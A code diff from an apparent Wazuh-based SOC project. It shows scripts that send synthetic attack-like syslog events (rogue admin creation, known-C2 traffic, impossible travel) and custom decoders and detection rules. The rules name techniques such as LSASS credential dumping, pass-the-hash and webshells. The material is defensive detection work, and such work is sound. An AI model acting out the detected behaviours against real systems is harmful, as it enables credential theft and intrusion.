+      "date=2026-03-09 time=10:02:04 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079324 vd=\"root\" logid=\"0100044547\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"password-change\" ui=\"https(10.20.55.1)\""
+      "date=2026-03-09 time=10:02:17 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079337 vd=\"root\" logid=\"0100044548\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"create-admin\" target_user=\"soc-backup-admin\""
+      "date=2026-03-09 time=10:04:03 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079443 vd=\"root\" logid=\"0100044552\" type=\"event\" subtype=\"system\" level=\"notice\" user=\"admin\" action=\"download-config\" dstip=10.20.50.33"
+      "date=2026-03-09 time=10:07:59 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079679 vd=\"root\" logid=\"0000000014\" type=\"traffic\" subtype=\"forward\" level=\"warning\" srcip=10.20.55.50 dstip=203.0.113.60 dstport=443 threat_label=\"known-c2\" action=\"accept\""
+      "date=2026-03-09 time=10:31:00 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773081060 vd=\"root\" logid=\"0101037135\" type=\"event\" subtype=\"vpn\" tunneltype=\"ssl\" action=\"ssl-login-success\" user=\"analyst01\" srcip=203.0.113.71 previous_country=TH current_country=US"
+      "soc_event=correlation event_type=c1_impossible_travel user=\"analyst01\" src_ip=203.0.113.71 prev_ip=203.0.113.11 prev_country=TH current_country=US distance_km=13890 travel_minutes=18"
+    )
+    for idx in "${!guaranteed_lines[@]}"; do
+      tag="${guaranteed_tags[$idx]}"
+      if selector_matches_tag "$selector" "$tag"; then
+        EVENT_POOL_TAGS+=("$tag")
+        EVENT_POOL_LINES+=("${guaranteed_lines[$idx]}")
+      fi
+    done
+  fi
+
+  EVENT_POOL_READY=1
+}
+
+send_random_event_once() {
+  local selector size idx line tag
+  selector="$1"
+  if [ "$EVENT_POOL_READY" -ne 1 ] || [ "$EVENT_POOL_SELECTOR" != "$selector" ]; then
+    build_event_pool "$selector"
+  fi
+  size="${#EVENT_POOL_LINES[@]}"
+  if [ "$size" -eq 0 ]; then
+    echo "random_sent=0 selector=$(normalize "$selector")"
+    return 0
+  fi
+  idx=$((RANDOM % size))
+  tag="${EVENT_POOL_TAGS[$idx]}"
+  line="${EVENT_POOL_LINES[$idx]}"
+  line="$(mock_line "$line")"
+  emit_syslog "$line"
+  echo "random_sent=1 tag=${tag} selector=$(normalize "$selector")"
+}
+
+if ! is_valid_selector "$SELECTOR"; then
+  echo "error: selector must be one of all|a|b|c|appendix-a|appendix-b|appendix-c|a1..a4|b1..b3|c1..c3|A1-01..C3-04"
+  exit 1
+fi
+
+FILES=()
+while IFS= read -r f; do
+  [ -n "$f" ] && FILES+=("$f")
+done < <(sample_files_for_selector "$SELECTOR")
+
+for f in "${FILES[@]}"; do
+  if [ ! -f "$f" ]; then
+    echo "error: missing sample file '$f'"
+    exit 1
+  fi
+done
+
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s forever=${FOREVER} dry_run=${DRY_RUN} mock_values=${MOCK_VALUES} guarantee_hits=${GUARANTEE_HITS} random_types=${RANDOM_TYPES} include_nonalerts=${INCLUDE_NONALERTS} docker_send=${DOCKER_SEND} nc_wait=${NC_WAIT_SECONDS}s strict_send=${STRICT_SEND}"
+echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
+
+if [ "$RANDOM_TYPES" = "1" ]; then
+  if [ "$FOREVER" -eq 1 ]; then
+    loop=1
+    while true; do
+      send_random_event_once "$SELECTOR"
+      echo "loop=${loop} complete"
+      loop=$((loop + 1))
+      sleep "$DELAY"
+    done
+  else
+    for ((i=1; i<=COUNT; i++)); do
+      send_random_event_once "$SELECTOR"
+      echo "iteration=${i}/${COUNT} complete"
+      sleep "$DELAY"
+    done
+  fi
+elif [ "$FOREVER" -eq 1 ]; then
+  loop=1
+  while true; do
+    for f in "${FILES[@]}"; do
+      send_file_once "$f" "$SELECTOR"
+    done
+    if [ "$GUARANTEE_HITS" = "1" ]; then
+      send_guaranteed_hits_once "$SELECTOR"
+    fi
+    echo "loop=${loop} complete"
+    loop=$((loop + 1))
+  done
+else
+  for ((i=1; i<=COUNT; i++)); do
+    for f in "${FILES[@]}"; do
+      send_file_once "$f" "$SELECTOR"
+    done
+    if [ "$GUARANTEE_HITS" = "1" ]; then
+      send_guaranteed_hits_once "$SELECTOR"
+    fi
+    echo "iteration=${i}/${COUNT} complete"
+  done
+fi

scripts/send-wazuh-test-events.sh

@@ -1,132 +0,0 @@
-#!/usr/bin/env bash
-set -euo pipefail
-
-SCENARIO="${1:-all}"
-COUNT="${2:-1}"
-DELAY="${3:-0.3}"
-FOREVER="false"
-
-for arg in "${@:4}"; do
-  case "${arg}" in
-    --forever)
-      FOREVER="true"
-      ;;
-    *)
-      echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
-      exit 1
-      ;;
-  esac
-done
-
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
-WAZUH_TEST_SRC_IP="${WAZUH_TEST_SRC_IP:-203.0.113.10}"
-WAZUH_TEST_DOMAIN="${WAZUH_TEST_DOMAIN:-malicious.example}"
-WAZUH_TEST_USER="${WAZUH_TEST_USER:-guest.user}"
-
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
-  echo "error: count must be a positive integer"
-  exit 1
-fi
-
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: delay must be numeric (example: 0.5)"
-  exit 1
-fi
-
-emit_syslog() {
-  local msg="$1"
-  local sent="false"
-
-  if command -v nc >/dev/null 2>&1; then
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-    echo "hint: install netcat or run with bash UDP support (/dev/udp)"
-    return 1
-  fi
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
-}
-
-random_id() {
-  printf "%s" "evt-$(date +%s)-$RANDOM-$RANDOM"
-}
-
-send_ioc_dns() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=ioc_dns src_ip=${WAZUH_TEST_SRC_IP} query=${WAZUH_TEST_DOMAIN} action=blocked severity=medium"
-}
-
-send_ioc_ips() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=ioc_ips src_ip=${WAZUH_TEST_SRC_IP} dst_ip=198.51.100.55 signature='Known C2 Beacon' severity=high"
-}
-
-send_vpn_outside_th() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=vpn_geo_anomaly user=${WAZUH_TEST_USER} src_ip=${WAZUH_TEST_SRC_IP} country=US success=true severity=high"
-}
-
-send_windows_auth_fail() {
-  local eid
-  eid="$(random_id)"
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=windows_auth_fail user=${WAZUH_TEST_USER} src_ip=${WAZUH_TEST_SRC_IP} attempts=7 severity=medium"
-}
-
-send_once() {
-  case "${SCENARIO}" in
-    ioc_dns)
-      send_ioc_dns
-      ;;
-    ioc_ips)
-      send_ioc_ips
-      ;;
-    vpn_outside_th)
-      send_vpn_outside_th
-      ;;
-    windows_auth_fail)
-      send_windows_auth_fail
-      ;;
-    all)
-      send_ioc_dns
-      send_ioc_ips
-      send_vpn_outside_th
-      send_windows_auth_fail
-      ;;
-    *)
-      echo "error: unknown scenario '${SCENARIO}'"
-      echo "valid: ioc_dns | ioc_ips | vpn_outside_th | windows_auth_fail | all"
-      exit 1
-      ;;
-  esac
-}
-
-if [[ "${FOREVER}" == "true" ]]; then
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
-  trap 'echo; echo "stopped"; exit 0' INT TERM
-  while true; do
-    send_once
-    sleep "${DELAY}"
-  done
-else
-  for ((i=1; i<=COUNT; i++)); do
-    send_once
-    if [[ "${i}" -lt "${COUNT}" ]]; then
-      sleep "${DELAY}"
-    fi
-  done
-fi

wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml

@@ -1,25 +1,17 @@
-<!-- SOC MVP local decoders (minimal production-safe set) -->
+<!--
+  SOC custom decoders (production-focused baseline)
+  - Decodes real correlation payloads produced by SOC Integrator
+  - Decodes real DNS IOC payloads
+-->
 
-<decoder name="soc-kv-base">
-  <prematch>soc_mvp_test=true</prematch>
+<decoder name="soc-prod-dns">
+  <prematch>soc_event=dns_ioc</prematch>
+  <regex type="pcre2">event_type=(\S+)(?:.*?src_ip=([\d.]+))?</regex>
+  <order>status, srcip</order>
 </decoder>
 
-<decoder name="soc-dns-ioc">
-  <parent>soc-kv-base</parent>
-  <prematch>source=dns</prematch>
-</decoder>
-
-<decoder name="soc-vmware-auth">
-  <parent>soc-kv-base</parent>
-  <prematch>source=vmware</prematch>
-</decoder>
-
-<decoder name="soc-log-monitor">
-  <parent>soc-kv-base</parent>
-  <prematch>source=log_monitor</prematch>
-</decoder>
-
-<decoder name="soc-windows-sysmon">
-  <parent>soc-kv-base</parent>
-  <prematch>source=windows_sysmon</prematch>
+<decoder name="soc-prod-integrator">
+  <prematch>soc_event=correlation</prematch>
+  <regex type="pcre2">event_type=(\S+)(?:.*?user="([^"]+)")?(?:.*?src_ip=([\d.]+))?</regex>
+  <order>status, srcuser, srcip</order>
 </decoder>

wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml

@@ -1,311 +1,21 @@
-<group name="soc_mvp_test,">
-  <!-- Base marker for all synthetic SOC simulation events -->
-  <rule id="100200" level="3">
-    <match>soc_mvp_test=true</match>
-    <description>SOC MVP synthetic test event detected</description>
-    <group>soc_mvp_test,syslog,</group>
-  </rule>
-
-  <!-- Proposal-level grouping -->
-  <rule id="100210" level="5">
-    <if_sid>100200</if_sid>
-    <match>usecase_id=A</match>
-    <description>Proposal Appendix A simulation event</description>
-    <group>soc_mvp_test,proposal_appendix_a,</group>
-  </rule>
+<!--
+  SOC custom local rules (production-focused baseline)
+  Rule IDs in this file:
+    100250: DNS/IOC decoder anchor (soc-prod-dns)
+    100260: soc-integrator correlation decoder anchor (soc-prod-integrator)
+-->
+<group name="soc_prod_base,">
 
-  <rule id="100220" level="5">
-    <if_sid>100200</if_sid>
-    <match>usecase_id=B</match>
-    <description>Proposal Appendix B simulation event</description>
-    <group>soc_mvp_test,proposal_appendix_b,</group>
+  <rule id="100250" level="3">
+    <decoded_as>soc-prod-dns</decoded_as>
+    <description>SOC PROD: DNS/IOC anchor event</description>
+    <group>soc_prod_base,dns_ioc,</group>
   </rule>
 
-  <rule id="100230" level="5">
-    <if_sid>100200</if_sid>
-    <match>usecase_id=C</match>
-    <description>Proposal Appendix C simulation event</description>
-    <group>soc_mvp_test,proposal_appendix_c,</group>
+  <rule id="100260" level="3">
+    <decoded_as>soc-prod-integrator</decoded_as>
+    <description>SOC PROD: soc-integrator correlation anchor event</description>
+    <group>soc_prod_base,correlation,</group>
   </rule>
 
-  <!-- Appendix A1 (Medium) -->
-  <rule id="100301" level="8"><if_sid>100210</if_sid><match>usecase_id=A1-01</match><description>A1-01 DNS Network Traffic Communicate to Malicious Domain</description><group>soc_mvp_test,appendix_a,a1,ioc,</group></rule>
-  <rule id="100302" level="8"><if_sid>100210</if_sid><match>usecase_id=A1-02</match><description>A1-02 DNS Network Traffic Malicious Domain IOCs Detection</description><group>soc_mvp_test,appendix_a,a1,ioc,</group></rule>
-
-  <!-- Appendix A2 (FortiGate IPS/IDS & Firewall) -->
-  <rule id="100311" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-01</match><description>A2-01 Allowed RDP from Public IPs</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100312" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-02</match><description>A2-02 Firewall Account Admin Password Change</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100313" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-03</match><description>A2-03 Firewall Account Create Add Admin Account</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100314" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-04</match><description>A2-04 Firewall Configure Disabled Email Notification</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100315" level="5"><if_sid>100210</if_sid><match>usecase_id=A2-05</match><description>A2-05 Firewall Configure Download Configure FW</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100316" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-06</match><description>A2-06 IDS Alert Multiple Critical High</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100317" level="5"><if_sid>100210</if_sid><match>usecase_id=A2-07</match><description>A2-07 Network Traffic Port Scanning</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100318" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-08</match><description>A2-08 Network Traffic IOC Detection</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100319" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-09</match><description>A2-09 Port Scanning from Private IP</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-  <rule id="100320" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-10</match><description>A2-10 Communicate to Malicious IP</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
-
-  <!-- Appendix A3 (FortiGate VPN) -->
-  <rule id="100331" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-01</match><description>A3-01 VPN Authentication Success from Guest Account</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
-  <rule id="100332" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-02</match><description>A3-02 VPN Authentication Success from Multiple Country</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
-  <rule id="100333" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-03</match><description>A3-03 VPN Authentication Brute Force Success</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
-  <rule id="100334" level="5"><if_sid>100210</if_sid><match>usecase_id=A3-04</match><description>A3-04 VPN Authentication Multiple Fail Many Accounts from One Source</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
-  <rule id="100335" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-05</match><description>A3-05 VPN Authentication Success from Outside Thailand</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
-
-  <!-- Appendix A4 (Windows/AD) -->
-  <rule id="100341" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-01</match><description>A4-01 Windows Authentication Multiple Fail from Privileged Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100342" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-02</match><description>A4-02 Windows Authentication Multiple Fail from Service Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100343" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-03</match><description>A4-03 Windows AD Enumeration with Malicious Tools</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100344" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-04</match><description>A4-04 Windows Authentication Fail from Public IPs</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100345" level="8"><if_sid>100210</if_sid><match>usecase_id=A4-05</match><description>A4-05 Windows File Share Enumeration to Single Destination</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100346" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-06</match><description>A4-06 Windows Authentication Success from Public IPs</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100347" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-07</match><description>A4-07 Windows Authentication Privileged Account Impersonation</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100348" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-08</match><description>A4-08 Windows Authentication Successful Pass the Hash RDP</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100349" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-09</match><description>A4-09 Windows Authentication Success from Guest Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100350" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-10</match><description>A4-10 Windows Authentication Interactive Logon Success by Service Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100351" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-11</match><description>A4-11 Windows Account Added to Privileged Custom Group</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100352" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-12</match><description>A4-12 Windows Account Added to Privileged Group</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100353" level="12"><if_sid>100210</if_sid><match>usecase_id=A4-13</match><description>A4-13 Windows Domain Configure DSRM Password Reset</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100354" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-14</match><description>A4-14 Windows Authentication Multiple Fail One Account from Many Sources</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100355" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-15</match><description>A4-15 Windows Authentication Multiple Fail Many Accounts from One Source</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100356" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-16</match><description>A4-16 Windows Authentication Multiple Fail from Guest Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100357" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-17</match><description>A4-17 Windows Authentication Multiple Fail One Account from One Source</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100358" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-18</match><description>A4-18 Windows Authentication Multiple Interactive Logon Denied</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100359" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-19</match><description>A4-19 Windows Authentication Password Spray</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100360" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-20</match><description>A4-20 Windows Authentication Attempt from Disabled Account</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100361" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-21</match><description>A4-21 Windows Domain Account Created</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100362" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-22</match><description>A4-22 Windows Local Account Re Enabled</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100363" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-23</match><description>A4-23 Windows Local Account Created</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-  <rule id="100364" level="5"><if_sid>100210</if_sid><match>usecase_id=A4-24</match><description>A4-24 Windows Domain Account Re Enabled</description><group>soc_mvp_test,appendix_a,a4,windows,</group></rule>
-
-  <!-- Appendix B1 (VMware vCenter/ESXi) -->
-  <rule id="100401" level="12"><if_sid>100220</if_sid><match>usecase_id=B1-01</match><description>B1-01 vCenter GUI Login Failed 5 Times and Success 1 Time</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
-  <rule id="100402" level="8"><if_sid>100220</if_sid><match>usecase_id=B1-02</match><description>B1-02 ESXi Enable SSH on Hosts</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
-  <rule id="100403" level="12"><if_sid>100220</if_sid><match>usecase_id=B1-03</match><description>B1-03 ESXi SSH Failed 5 Times and Success 1 Time</description><group>soc_mvp_test,appendix_b,b1,vmware,</group></rule>
-
-  <!-- Appendix B2 (Log monitoring) -->
-  <rule id="100411" level="5"><if_sid>100220</if_sid><match>usecase_id=B2-01</match><description>B2-01 Log Monitor Logs Loss Detection</description><group>soc_mvp_test,appendix_b,b2,logmonitor,</group></rule>
-
-  <!-- Appendix B3 (Windows Sysmon) -->
-  <rule id="100421" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-01</match><description>B3-01 Sysmon LSASS Dumping</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
-  <rule id="100422" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-02</match><description>B3-02 Sysmon SQL Injection</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
-  <rule id="100423" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-03</match><description>B3-03 Sysmon Webshell</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
-  <rule id="100424" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-04</match><description>B3-04 Sysmon Uninstall</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
-  <rule id="100425" level="12"><if_sid>100220</if_sid><match>usecase_id=B3-05</match><description>B3-05 Sysmon LSASS Dumping by Task Manager</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
-  <rule id="100426" level="8"><if_sid>100220</if_sid><match>usecase_id=B3-06</match><description>B3-06 Sysmon CertUtil Download</description><group>soc_mvp_test,appendix_b,b3,sysmon,</group></rule>
-
-  <!-- Appendix C1 (Impossible travel) -->
-  <rule id="100501" level="12"><if_sid>100230</if_sid><match>usecase_id=C1-01</match><description>C1-01 Impossible Travel Detection</description><group>soc_mvp_test,appendix_c,c1,identity,</group></rule>
-
-  <!-- Appendix C2 (Credential abuse & privilege misuse) -->
-  <rule id="100511" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-01</match><description>C2-01 Privileged Account Usage Outside Business Hours</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
-  <rule id="100512" level="8"><if_sid>100230</if_sid><match>usecase_id=C2-02</match><description>C2-02 Dormant Account Activation</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
-  <rule id="100513" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-03</match><description>C2-03 Service Account Interactive Logon</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
-  <rule id="100514" level="12"><if_sid>100230</if_sid><match>usecase_id=C2-04</match><description>C2-04 Rapid Privilege Escalation Followed by Sensitive Access</description><group>soc_mvp_test,appendix_c,c2,identity,</group></rule>
-
-  <!-- Appendix C3 (Lateral movement & internal recon) -->
-  <rule id="100521" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-01</match><description>C3-01 Multiple Authentication Success Across Hosts</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
-  <rule id="100522" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-02</match><description>C3-02 SMB/RDP Lateral Burst Pattern</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
-  <rule id="100523" level="12"><if_sid>100230</if_sid><match>usecase_id=C3-03</match><description>C3-03 Admin Account Accessing Many Servers Rapidly</description><group>soc_mvp_test,appendix_c,c3,lateral_movement,</group></rule>
-  <rule id="100524" level="8"><if_sid>100230</if_sid><match>usecase_id=C3-04</match><description>C3-04 Internal Scanning / Enumeration Behavior</description><group>soc_mvp_test,appendix_c,c3,recon,</group></rule>
-  <!-- ========================= -->
-  <!-- Production profile rules -->
-  <!-- ========================= -->
-  <!--
-    Production profile (second profile):
-    - Does not depend on simulation marker fields (soc_mvp_test/usecase_id)
-    - Uses source-like patterns that can appear in real logs
-    - Rule IDs are separated from simulation profile in 110xxx range
-  -->
-
-  <rule id="110200" level="3">
-    <description>SOC MVP production profile enabled</description>
-    <group>soc_mvp_prod,baseline,</group>
-  </rule>
-
-  <!-- Appendix A1: DNS / Firewall IOC -->
-  <rule id="110301" level="8">
-    <decoded_as>soc-dns-ioc</decoded_as>
-    <match>event_type=ioc_dns_traffic</match>
-    <match>malicious.example</match>
-    <description>A1 production: DNS query to malicious domain indicator</description>
-    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
-  </rule>
-  <rule id="110302" level="8">
-    <decoded_as>soc-dns-ioc</decoded_as>
-    <match>event_type=ioc_domain_match</match>
-    <description>A1 production: DNS IOC domain match event</description>
-    <group>soc_mvp_prod,appendix_a,a1,ioc,dns,</group>
-  </rule>
-
-  <!-- Appendix A2: FortiGate IPS/IDS & Firewall -->
-  <rule id="110311" level="12">
-    <match>vendor=fortinet</match>
-    <match>dstport=3389</match>
-    <match>action="accept"</match>
-    <description>A2 production: FortiGate allowed RDP traffic detected</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
-  </rule>
-  <rule id="110312" level="12">
-    <match>vendor=fortinet</match>
-    <match>action="password-change"</match>
-    <description>A2 production: FortiGate admin password change</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
-  </rule>
-  <rule id="110313" level="12">
-    <match>vendor=fortinet</match>
-    <match>action="create-admin"</match>
-    <description>A2 production: FortiGate admin account creation</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
-  </rule>
-  <rule id="110314" level="12">
-    <match>vendor=fortinet</match>
-    <match>action="disable-email-notification"</match>
-    <description>A2 production: FortiGate email notification disabled</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
-  </rule>
-  <rule id="110315" level="5">
-    <match>vendor=fortinet</match>
-    <match>action="download-config"</match>
-    <description>A2 production: FortiGate configuration download</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,</group>
-  </rule>
-  <rule id="110316" level="8">
-    <match>vendor=fortinet</match>
-    <match>subtype="ips"</match>
-    <match>severity="critical"</match>
-    <description>A2 production: FortiGate critical IPS alert</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ips,</group>
-  </rule>
-  <rule id="110317" level="5">
-    <match>vendor=fortinet</match>
-    <match>event_type=port_scan</match>
-    <description>A2 production: FortiGate port scanning indicator</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,recon,</group>
-  </rule>
-  <rule id="110318" level="8">
-    <match>vendor=fortinet</match>
-    <match>event_type=ioc_detection</match>
-    <description>A2 production: FortiGate IOC detection event</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
-  </rule>
-  <rule id="110320" level="8">
-    <match>vendor=fortinet</match>
-    <match>event_type=malicious_ip_communication</match>
-    <description>A2 production: Communication to malicious IP detected</description>
-    <group>soc_mvp_prod,appendix_a,a2,fortigate,ioc,</group>
-  </rule>
-
-  <!-- Appendix A3: FortiGate VPN -->
-  <rule id="110331" level="12">
-    <match>subtype="vpn"</match>
-    <match>success=true</match>
-    <match>guest</match>
-    <description>A3 production: VPN success by guest account</description>
-    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
-  </rule>
-  <rule id="110333" level="12">
-    <match>subtype="vpn"</match>
-    <match>event_type=vpn_bruteforce_success</match>
-    <description>A3 production: VPN brute-force success indicator</description>
-    <group>soc_mvp_prod,appendix_a,a3,vpn,</group>
-  </rule>
-  <rule id="110335" level="12">
-    <match>subtype="vpn"</match>
-    <match>success=true</match>
-    <match>country=</match>
-    <description>A3 production: VPN success with country context (geo-anomaly candidate)</description>
-    <group>soc_mvp_prod,appendix_a,a3,vpn,geo,</group>
-  </rule>
-
-  <!-- Appendix A4: Windows / Active Directory -->
-  <rule id="110341" level="8">
-    <match>source=windows</match>
-    <match>event_id=4625</match>
-    <match>is_admin=true</match>
-    <description>A4 production: Privileged account authentication failures</description>
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
-  </rule>
-  <rule id="110342" level="8">
-    <match>source=windows</match>
-    <match>event_id=4625</match>
-    <match>is_service=true</match>
-    <description>A4 production: Service account authentication failures</description>
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_fail,</group>
-  </rule>
-  <rule id="110346" level="12">
-    <match>source=windows</match>
-    <match>event_id=4624</match>
-    <match>src_ip=</match>
-    <description>A4 production: Windows successful authentication with source IP context</description>
-    <group>soc_mvp_prod,appendix_a,a4,windows,auth_success,</group>
-  </rule>
-  <rule id="110352" level="12">
-    <match>source=windows</match>
-    <match>event_id=4728</match>
-    <match>target_group=</match>
-    <description>A4 production: Account added to privileged group (domain scope)</description>
-    <group>soc_mvp_prod,appendix_a,a4,windows,privilege,</group>
-  </rule>
-  <rule id="110353" level="12">
-    <match>source=windows</match>
-    <match>event_id=4732</match>
-    <match>target_group=</match>
